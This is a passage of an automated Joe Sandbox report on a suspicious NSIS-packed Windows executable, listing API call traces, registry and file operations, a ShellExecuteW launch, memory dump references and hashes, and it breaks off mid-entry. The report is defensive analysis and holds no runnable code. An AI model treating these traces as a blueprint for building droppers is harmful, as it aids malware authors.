                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
                                                  • Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
                                                  • Opcode Fuzzy Hash: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
                                                  • Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: Call
                                                  • API String ID: 3394109436-1824292864
                                                  • Opcode ID: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
                                                  • Instruction ID: 832337492cf7a06c21e2abca279de06bf1a27b56728bc0a7368b5bd0ba670fc7
                                                  • Opcode Fuzzy Hash: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
                                                  • Instruction Fuzzy Hash: 2321D2B2604101ABCB10DBA4DE8495FB3A8EB49314B24093BF581F33D1D778A8419FAD
                                                  APIs
                                                    • Part of subcall function 0040622B: FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406236
                                                    • Part of subcall function 0040622B: FindClose.KERNEL32(00000000), ref: 00406242
                                                  • lstrlenW.KERNEL32 ref: 004021DE
                                                  • lstrlenW.KERNEL32(00000000), ref: 004021E9
                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
                                                  • Instruction ID: 6bed8099c30f558e68629b23c483ae923e88bf7bf978b8bddb761e1df3150e64
                                                  • Opcode Fuzzy Hash: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
                                                  • Instruction Fuzzy Hash: 8C115271D10214A6CB10EFF9C949A9FB7B8EF14314F20843BB511FB2D5D6B899418B59
                                                  APIs
                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseOpenValue
                                                  • String ID:
                                                  • API String ID: 167947723-0
                                                  • Opcode ID: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
                                                  • Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
                                                  • Opcode Fuzzy Hash: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
                                                  • Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A
                                                  APIs
                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\Uploadable\normallnnens\Trskelen,?), ref: 00401E3D
                                                  Strings
                                                  • C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 00401E26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: C:\Users\user\Uploadable\normallnnens\Trskelen
                                                  • API String ID: 587946157-936114887
                                                  • Opcode ID: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
                                                  • Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
                                                  • Opcode Fuzzy Hash: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
                                                  • Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: EnumErrorLastWindows
                                                  • String ID:
                                                  • API String ID: 14984897-0
                                                  • Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                                                  • Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
                                                  • Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                                                  • Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95
                                                  APIs
                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
                                                  • Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
                                                  • Opcode Fuzzy Hash: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
                                                  • Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A
                                                  APIs
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                    • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 004059EC
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                  • lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00405A94
                                                  • GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405AA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID:
                                                  • API String ID: 3248276644-0
                                                  • Opcode ID: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
                                                  • Instruction ID: fe6b2c3b67c783468e3d99353c909943c883638b9352ade8fce09ac857d2aff0
                                                  • Opcode Fuzzy Hash: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
                                                  • Instruction Fuzzy Hash: EEF0F925305E5359D62133365C85EAF1554CF96364719073BB861B11D1CB3C8943CDBD
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                  • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                  • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                  • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                                                  • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                                                  • Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                                                  • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405B58
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                  • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                                                  • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                  • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                  • Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
                                                  • Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                  • Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E
                                                  APIs
                                                  • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
